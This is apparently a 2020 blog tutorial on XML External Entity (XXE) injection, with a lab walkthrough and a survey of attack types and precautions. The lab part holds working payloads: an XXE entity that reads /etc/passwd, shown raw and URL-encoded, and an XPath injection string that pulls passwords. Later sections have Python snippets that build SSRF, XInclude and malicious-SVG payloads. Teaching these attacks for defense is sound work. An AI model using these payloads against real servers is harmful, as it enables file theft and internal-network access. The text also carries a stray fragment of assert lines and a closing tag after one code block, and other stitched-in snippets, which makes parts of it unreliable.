What is XXE Vulnerability and How is it Exploited?

10 min read · Dec 11, 2020

In this article, we will search for answers to the questions about the vulnerabilities caused by XXE and how to exploit them.

To understand XXE, we first need to understand what XML is.

What is XML (Extensible Markup Language)?

XML stands for Extensible Markup Language. It was developed by a working group of the W3C (World Wide Web Consortium) and became a W3C Recommendation in 1998. Tim Berners-Lee, the creator of HTML, founded the W3C, but he did not create XML.

XML is a standard for data exchange and data storage. It enables different systems to exchange data with each other.

By definition:

Extensible Markup Language (XML for short) is a markup language for creating documents that can be easily read by both people and computing systems. It is a standard defined by the W3C. In addition to storing data, it serves as an intermediate format for exchanging data between different systems. It is a simplified subset of SGML.

Nowadays, many applications exchange data with other applications in XML format. It is also possible to come across applications that use XML as their primary format. Since XML is not well suited to random data access, it is generally not used as a database.

DataSet objects in Microsoft’s .NET technology can be written to and read from XML. In addition, XML has become the basis of office document formats.

Separate handling of content, document structure, and presentation makes XML a good fit for content management systems.

Let’s continue with a concrete example for a clearer understanding.

Let’s say I have an e-commerce site where I am responsible for content management. In this e-commerce site, carpets of Turkey’s top 8 brands are sold. Each brand has over 100 models, and each model has about 15 different types, and each type has at least 7 different sizes.

In this case, we have approximately:

• 8 brands
• 800 models
• 12,000 types
• 84,000 sizes

that need to be uploaded to the website. If you were responsible for adding all these products to the site in as little as 1 week, could you do this?

If you tried to enter the products one by one and spent 2 minutes on each size, entering all of them would take 168,000 minutes.

What does 168,000 minutes mean?

• 2,800 hours
• about 117 days
• about 3.9 months of non-stop work
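The estimate can be reproduced with a few lines of Python. This is only a back-of-the-envelope sketch: it uses the round numbers from the text (100 models per brand, 15 types per model, 7 sizes per type) and assumes 24-hour working days and 30-day months.

```python
# Back-of-the-envelope estimate for entering every product by hand.
BRANDS = 8
MODELS_PER_BRAND = 100
TYPES_PER_MODEL = 15
SIZES_PER_TYPE = 7
MINUTES_PER_ENTRY = 2

models = BRANDS * MODELS_PER_BRAND
types = models * TYPES_PER_MODEL
sizes = types * SIZES_PER_TYPE

total_minutes = sizes * MINUTES_PER_ENTRY
hours = total_minutes / 60
days = hours / 24      # assumes working 24 hours a day
months = days / 30     # assumes 30-day months

print(models, types, sizes)
print(total_minutes, hours, round(days, 1), round(months, 1))
```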

This is where XML becomes a savior. If you bring together all your products in a suitable XML format, you can upload a single XML file to your e-commerce site, and add your products in a very short time.
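As a rough illustration of such a bulk upload, the sketch below reads a small product file with Python's standard library. The catalog layout, the element and attribute names, and the load_products helper are all hypothetical; a real e-commerce platform defines its own import format.

```python
import xml.etree.ElementTree as ET

# Hypothetical catalog layout; element and attribute names are illustrative.
CATALOG_XML = """<catalog>
  <product brand="BrandA" model="Model1" type="Classic">
    <size>80x150</size>
    <size>120x180</size>
  </product>
  <product brand="BrandB" model="Model7" type="Modern">
    <size>160x230</size>
  </product>
</catalog>"""


def load_products(xml_text):
    """Return one (brand, model, type, size) tuple per size in the catalog."""
    root = ET.fromstring(xml_text)
    rows = []
    for product in root.iter("product"):
        for size in product.findall("size"):
            rows.append((product.get("brand"), product.get("model"),
                         product.get("type"), size.text))
    return rows


products = load_products(CATALOG_XML)
for row in products:
    print(row)
```

Each tuple could then be written to the shop's database in one pass instead of being typed in by hand.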

From this point of view it looks great, but every system should be examined for both its positive and negative aspects. To give a general picture, let’s look at both.

Positive aspects:

• Dynamic and fast e-commerce sites through XML integration
• Tags defined in a universal, understandable language
• Works on every system, with no platform dependency
• Compatibility and interoperability between different systems
• Easy to learn
• Easy access to the data it holds, which makes it easy to work with in applications

Negative aspects:

• XML does not define how data is processed.
• XML cannot do wonders on its own. It requires parsers and applications to process it.
• The security flaws that come with it.

The most important point here is the security flaws.

What is XXE (XML External Entity)?

XXE injection is a vulnerability that is triggered when an XML parser processes input containing a specially defined external entity and resolves that entity.

To understand this vulnerability, there are a few other concepts that we need to understand.

Document Type (DOCTYPE)

An XML file can contain a declaration called DOCTYPE. The DOCTYPE declaration specifies information such as the type of document being processed, the name and version of the package in which the tags that make up the document are defined, where that package can be found, and definitions of additional files that make up the document.

Document Type Definition (DTD)

XML itself does not prescribe which tags a document must use, but when data is moved between two platforms it has to follow a common structure that both sides agree on. This structure is defined by a DTD. With a DTD, the rules for a particular system can be defined.

Considering a DTD as a set of rules, we can place it inside the XML document or in an external .dtd file. DTDs are therefore divided into two classes: internal and external.

Let’s share a short DTD example for clarity.
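A minimal sketch of such a document is shown here as a Python string so that it can be parsed and checked. The guide, person, name, and phone elements and the sample values are assumptions made for illustration; they are not taken from the original example.

```python
import xml.etree.ElementTree as ET

# Hypothetical "guide" document with an internal DTD.
GUIDE_XML = """<?xml version="1.0"?>
<!DOCTYPE guide [
  <!ELEMENT guide (person+)>
  <!ELEMENT person (name, phone)>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT phone (#PCDATA)>
]>
<guide>
  <person>
    <name>Serhan</name>
    <phone>555-0100</phone>
  </person>
</guide>"""

# ElementTree reads the document but does not validate it against the DTD.
root = ET.fromstring(GUIDE_XML)
entries = [(p.findtext("name"), p.findtext("phone"))
           for p in root.findall("person")]
print(root.tag, entries)
```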

If you look at the example above, you can see that we created a simple guide.

If we look closely, we can see that this XML file contains a DTD, and that its elements are declared as Parsed Character Data (#PCDATA).

Difference Between Public and Private

External DTDs are divided into public and private. A public DTD is declared with the PUBLIC keyword and is fetched from a different, publicly known address, while a private DTD is declared with the SYSTEM keyword and is addressed through the server with which we communicate.
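To make the difference visible, the following sketch asks Python's expat bindings which identifiers a DOCTYPE declares. The two sample documents, the guide.dtd file name, and the example.com address are made up for illustration. Plain expat only reports the identifiers here and does not fetch the DTD.

```python
import xml.parsers.expat


def doctype_identifiers(xml_text):
    """Return (name, system_id, public_id) from the DOCTYPE, or None if absent."""
    found = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        found.append((name, system_id, public_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)
    return found[0] if found else None


# Private DTD: only a system identifier (hypothetical file name).
PRIVATE_DOC = '<!DOCTYPE guide SYSTEM "guide.dtd"><guide/>'

# Public DTD: a public identifier plus an address (both hypothetical).
PUBLIC_DOC = ('<!DOCTYPE guide PUBLIC "-//EXAMPLE//DTD Guide 1.0//EN" '
              '"http://example.com/guide.dtd"><guide/>')

print(doctype_identifiers(PRIVATE_DOC))
print(doctype_identifiers(PUBLIC_DOC))
```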

Exploit Samples

Now that we have explained some important concepts, we can move on to the XXE exploit section. We gave a short definition under What is XXE. Now let’s expand on it a little.

Let’s assume that there is an application that uses XML. If this application is open to our intervention when processing XML data, can we make a manipulation there? Can we access sensitive files? The answer to these questions is yes.

XXE is a server-side injection vulnerability.

We thought it would be more useful to examine XXE samples in a lab. For this reason, we will work through the Web for Pentester exercises.

Example 1:

First of all, it is useful to examine the source code of each page.

The page that opens:

Source Code:

Let’s take a closer look at the URL:

192.168.254.130/xml/example1.php?xml=<test>hacker</test>

When we examine the URL, we see a parameter named xml. The data entered between the test tags is assigned to this parameter and displayed on the page. Let’s first see what happens if we write something else between the test tags: let’s delete “hacker” and write “serhan was here”.

192.168.254.130/xml/example1.php?xml=<test>serhan was here</test>

As a result, we can see what we wrote on the page.

Now let’s try to break it by passing something that is not XML. For example, let’s set xml=serhan.

192.168.254.130/xml/example1.php?xml=serhan

When we did this, it gave an error. And we love errors because sometimes these errors can provide us with comprehensive information about the system.
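The same behaviour can be reproduced outside the lab. The lab page is written in PHP; the sketch below is only a Python stand-in, and the try_parse helper is hypothetical. It shows that well-formed input is accepted while a bare word makes the XML parser raise an error.

```python
import xml.etree.ElementTree as ET


def try_parse(value):
    """Parse the xml parameter the way a naive endpoint might and report the result."""
    try:
        return "ok: " + (ET.fromstring(value).text or "")
    except ET.ParseError as exc:
        return "error: " + str(exc)


print(try_parse("<test>serhan was here</test>"))
print(try_parse("serhan"))
```") == "ok: hacker"
assert try_parse("<test>serhan was here</test>") == "ok: serhan was here"
assert try_parse("serhan").startswith("error: ")
</test>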

The error output we received:

Examining the error output, we see that the parser complains because the parameter does not start with a “<” sign. This tells us that the value is passed directly to an XML parser, which we can use to exploit the system. For this, let’s use the payload below.

<!DOCTYPE sb [<!ELEMENT sb ANY><!ENTITY serhan SYSTEM "file:////etc/passwd">]><wsb>&serhan;</wsb>

Of course, before using it, let’s URL-encode it so that characters such as & and ; are not misinterpreted in the query string:

%3C%21DOCTYPE%20sb%20%5B%3C%21ELEMENT%20sb%20ANY%3E%3C%21ENTITY%20serhan%20SYSTEM%20%22file%3A%2F%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cwsb%3E%26serhan%3B%3C%2Fwsb%3E
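The encoded form does not have to be produced by hand. A small sketch using Python's urllib.parse.quote, with the payload written with straight double quotes, gives the same string; passing safe="" is a choice made here so that every reserved character, including the slashes, is encoded.

```python
from urllib.parse import quote, unquote

PAYLOAD = ('<!DOCTYPE sb [<!ELEMENT sb ANY>'
           '<!ENTITY serhan SYSTEM "file:////etc/passwd">]>'
           '<wsb>&serhan;</wsb>')

# safe="" also encodes "/" so nothing in the payload is left as-is.
encoded = quote(PAYLOAD, safe="")
url = "http://192.168.254.130/xml/example1.php?xml=" + encoded

print(encoded)
print(url)
```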

With this payload, we can read /etc/passwd, a file found on Linux systems that lists user accounts and can reveal valuable information.

Example 2:

Let’s take a look at our page again:

Source code:

Let’s try writing our own name instead of hacker where it says Name=hacker. When we enter Name=serhan, nothing is returned. That means we are missing something. Let’s try this with the tag, as we did in the previous example.

When we look at the source code in detail, we can see that an XML document is built as a string in the x variable. The xml variable is then created by parsing x with the simplexml_load_string function. The value of name from the GET request is placed into an XPath expression held in the xpath variable. Finally, a while loop prints the results of that expression to the page.

We now understand that name takes a value, but it gives an error when we write something other than admin or hacker. So let’s try to build on the hacker value that is already there.

Let’s try entering the following in the URL, which closes the quoted value and rewrites the XPath query (strictly speaking, this is an XPath injection rather than an XXE): hacker' or 1=1]/parent::node()/password%00

And we got our results.
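Why this input works becomes clearer when we look at the query string the server ends up with. The sketch below is a Python illustration, not the lab's PHP code: the XPATH_TEMPLATE value is an assumed query shape, and the helper that cuts the string at the null byte only mimics how a C library would presumably stop reading at %00.

```python
from urllib.parse import unquote

# Assumed query template; the lab's real source is not reproduced here.
XPATH_TEMPLATE = "users/user/name[.='{name}']/parent::*/message"


def build_xpath(name_param):
    """Insert the decoded name parameter into the query without any escaping."""
    return XPATH_TEMPLATE.format(name=unquote(name_param))


def as_seen_by_c_library(xpath):
    """Mimic a C string: everything after the first NUL byte is ignored."""
    return xpath.split("\x00", 1)[0]


normal = build_xpath("hacker")
injected = as_seen_by_c_library(
    build_xpath("hacker' or 1=1]/parent::node()/password%00"))

print(normal)
print(injected)
```

The condition 1=1 makes the predicate match every name element, and the rest of the injected path selects the password element instead of the one the developer intended.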

XXE Attack Types

1. Using XXE to Access Files

To perform an XXE injection attack that retrieves an arbitrary file from the server’s filesystem, we need to change the submitted XML in two ways.

First, we add (or edit) a DOCTYPE element that defines an external entity containing the path to the file. Second, we edit a data value in the XML that is returned in the application’s response so that it uses the defined external entity.

Let’s make the situation clear with an example. Let’s suppose I check the stock level of a carpet by sending XML to the server on the carpet sales site mentioned at the beginning of the article:

If the request above returns the stock level, what do you think the following request returns?
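The two requests could look like the strings in the sketch below. The stockCheck and productId element names, the product number, and the xxe entity name are assumptions chosen for illustration. The helper uses expat only to list which external entities a request body declares; plain expat does not fetch them.

```python
import xml.parsers.expat

# Hypothetical normal request body.
STOCK_CHECK = """<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>"""

# Same request with an external entity defined and used as the data value.
XXE_STOCK_CHECK = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>"""


def declared_external_entities(xml_text):
    """List (entity name, system identifier) pairs declared in the DOCTYPE."""
    found = []

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_text, True)
    return found


print(declared_external_entities(STOCK_CHECK))
print(declared_external_entities(XXE_STOCK_CHECK))
```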

If I have not put a specific defense against XXE attacks in place, a malicious hacker can read /etc/passwd by sending the request above.

2. SSRF Attack with XXE

To exploit an XXE vulnerability for an SSRF attack, we define an external XML entity that uses the URL we are targeting, and then use that entity within a data value. If the data value is one that the application returns in its response, we will see the response from the targeted URL inside the application’s response, which gives us two-way interaction with the backend system.
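As a sketch, the only difference from the file-reading case is that the entity points at a URL instead of a file. The build_ssrf_payload helper, the stockCheck layout, and the internal.example host below are all hypothetical; the scheme check is there only to keep the example focused on HTTP targets.

```python
from urllib.parse import urlparse


def build_ssrf_payload(target_url):
    """Return a request body whose external entity points at target_url."""
    if urlparse(target_url).scheme not in ("http", "https"):
        raise ValueError("expected an http(s) URL")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{target_url}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId></stockCheck>"
    )


# Hypothetical internal address that only the server can reach.
payload = build_ssrf_payload("http://internal.example/admin")
print(payload)
```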

3. Blind XXE

Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, so server-side files cannot be retrieved directly.

Blind XXE vulnerabilities can still be identified and exploited, but this may require more advanced techniques.

4. XInclude Attack

Some applications take the data sent by the client, insert it into an XML document on the server side, and then parse that document.

In this case, we cannot carry out a classic XXE attack because we do not control the entire XML document and therefore cannot define or modify a DOCTYPE element. However, we can use an XInclude attack instead. XInclude is a W3C specification that allows an XML document to be built from sub-documents. We can place an XInclude directive in any data value in an XML document, so the attack works even when we control only a single data item that is placed into a server-side XML document.

For example:
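The sketch below shows what such a data value can look like and what an XInclude-aware processor would be asked to load. Everything around the payload is an assumption: build_server_document imitates a server that pastes client data into its own XML, and fake_loader is a stand-in that records the request instead of reading any file.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

# Value an attacker might submit for a single field (no DOCTYPE needed).
XINCLUDE_VALUE = ('<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
                  '<xi:include parse="text" href="file:///etc/passwd"/></foo>')


def build_server_document(product_id):
    """Hypothetical server code that pastes client data into its own XML."""
    return f"<stockCheck><productId>{product_id}</productId></stockCheck>"


requested = []


def fake_loader(href, parse, encoding=None):
    """Stand-in loader: records the request instead of touching the filesystem."""
    requested.append((href, parse))
    return "[contents of " + href + "]"


root = ET.fromstring(build_server_document(XINCLUDE_VALUE))
ElementInclude.include(root, loader=fake_loader)  # expand xi:include elements
result = root.find("productId/foo").text

print(requested)
print(result)
```

With a real loader in place of fake_loader, the text of the requested file would end up inside the productId value.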

5. XXE Attack via File Upload

Some applications allow users to upload files that are later processed on the server side. Some common file formats use XML or include XML subcomponents. Examples of XML-based formats include office document formats such as DOCX, and image formats such as SVG.

For example, an application might allow users to upload images and then process or validate them on the server. Even if the application expects to receive a format such as PNG or JPEG, the image processing library it uses may also support SVG images. Because the SVG format uses XML, an attacker could submit a malicious SVG image and trigger the XXE vulnerability.
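A malicious SVG of this kind might look like the one in the sketch below. The file contents and the /etc/hostname target are illustrative assumptions. The upload_declares_doctype helper is likewise hypothetical: it is one simple way to notice that an uploaded "image" is really XML carrying a DOCTYPE, not a complete defense.

```python
import xml.parsers.expat

# Illustrative SVG that defines an external entity and prints it as text.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<svg xmlns="http://www.w3.org/2000/svg" width="128" height="128">
  <text x="0" y="16" font-size="16">&xxe;</text>
</svg>"""

PLAIN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"/>'
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # binary data, not XML


def upload_declares_doctype(data):
    """Return True if the upload is XML that carries a DOCTYPE declaration."""
    seen = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda *args: seen.append(args[0])
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError:
        pass  # not well-formed XML, for example a real PNG
    return bool(seen)


for name, data in [("malicious.svg", MALICIOUS_SVG),
                   ("plain.svg", PLAIN_SVG),
                   ("image.png", PNG_HEADER)]:
    print(name, upload_declares_doctype(data))
```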

Precautions for XXE Vulnerability

1. Keep XML processors and libraries updated to the latest version.
2. Use SOAP 1.2 or higher.
3. Turn off the XML External Entity feature of all XML parsers in the application.
4. Use input filtering based on a whitelist.
5. Almost all XXE vulnerabilities occur because the application’s XML parsing library supports potentially dangerous XML features that the application does not need or want to use. The easiest and most effective way to prevent XXE attacks is to disable these features.
6. Disable resolution of external entities and disable XInclude support.
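How external entities are turned off depends on the parser in use. As one hedged illustration, the sketch below uses Python's built-in SAX parser and sets the relevant features explicitly rather than relying on defaults. The TextCollector class, the parse_without_external_entities helper, and the throwaway secret.txt file are assumptions made for the demo.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes)


class TextCollector(ContentHandler):
    """Collect all character data so we can see what the parser produced."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(data):
    """Parse XML bytes with external entity resolution switched off."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # external general entities
    parser.setFeature(feature_external_pes, False)  # external parameter entities
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return "".join(handler.chunks)


# Demo: a throwaway file stands in for a sensitive server-side file.
with tempfile.TemporaryDirectory() as tmp:
    secret = Path(tmp) / "secret.txt"
    secret.write_text("TOP-SECRET")
    payload = (f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{secret.as_uri()}"> ]>'
               "<foo>before-&xxe;-after</foo>").encode("utf-8")
    text = parse_without_external_entities(payload)

print(repr(text))
```

The entity reference is left unresolved, so the contents of the file never reach the application. Other languages and libraries expose similar switches under different names.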

Sources:
https://tr.wikipedia.org/wiki/XML
https://canyoupwn.me/tr-xml-external-entity-xxe/
https://gaissecurity.com/yazi/xml-external-entity-injection-and-oob-out-of-band-data-retrieval
https://www.yusufsezer.com.tr/xml-dtd-nedir